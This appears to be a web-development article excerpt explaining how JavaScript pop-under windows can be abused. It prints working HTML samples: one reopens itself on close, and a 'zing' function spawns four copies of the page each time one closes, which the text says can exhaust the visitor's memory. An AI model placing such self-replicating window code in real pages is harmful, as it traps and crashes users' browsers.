Home > Articles > Web Development > HTML/CSS

  • Print
  • + Share This

You Said this Was Dangerous, Right?

Well, it could be. Any time you let someone else run a program on your computer, there exists the potential for disaster. The worst part about pops is their potential for even greater abuse or misuse. Let's look at another example that is almost identical to the first, but with two slight variations:

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript"></SCRIPT>
<TITLE>Pop Under Window</TITLE>
</HEAD>
<BODY onUnload=window.open('annoy.html').blur();window.focus();>
<P>
This window spawns a popunder.
</BODY></HTML>

In this instance, we're spawning the child window on unload rather than on load. What does that mean? It means that when the browser window is closed, we have one last chance to execute a command before the window goes away—a parting shot, if you will. So let's say that you have four advertisements you want people to look at: 1.html, 2.html, 3.html, and 4.html, respectively. You could use the onUnload command to automatically open up a different advertisement each time one is closed. If you're unscrupulous enough, you could do this all day long.

But let's go a little further, and pretend that you have only one ad, and you don't care if you annoy people with it—you just want them to see it. Look at this example:

<HTML>
<HEAD>
 <SCRIPT LANGUAGE="JavaScript"></SCRIPT>
 <TITLE>Pop Under Window</TITLE>
</HEAD>
<BODY onUnload=window.open('this-file.html').blur();window.focus();>
<P>
This window spawns a popunder.
</BODY></HTML>

Instead of calling a new browser window, this one calls itself back every time you close it. It's now become the advertisement that won't die.

But why stop there? Remember Hercules fighting the Hydra? Every time he cut off one of its heads, two new ones grew back in its place. And there's nothing to stop a JavaScript coder from doing the same thing.

Our code becomes only slightly more complicated because now we must create a function and call that function, but we can use it to do terrible things:

<html>
<head>
<SCRIPT LANGUAGE="JavaScript">

function zing() {
		window.open("this-page.html") 
		window.open("this-page.html")
		window.open("this-page.html") 
		window.open("this-page.html")
}
</script>

<title>Evil Code</title>
</head>
<body onUnload="zing()">

This page creates four copies of itself each time it is closed.

</body>
</html>

So in this example, we created a function called "zing" that does nothing but spawn itself four times whenever a copy of it is closed. Even worse would be calling up four copies of itself on load. Any computer accessing this page would then begin spawning copies of itself until it ran out of memory—grinding to a halt in some sort of Star Trek death.

  • + Share This
  • 🔖 Save To Your Account

Related Resources

There are currently no related titles. Please check back later.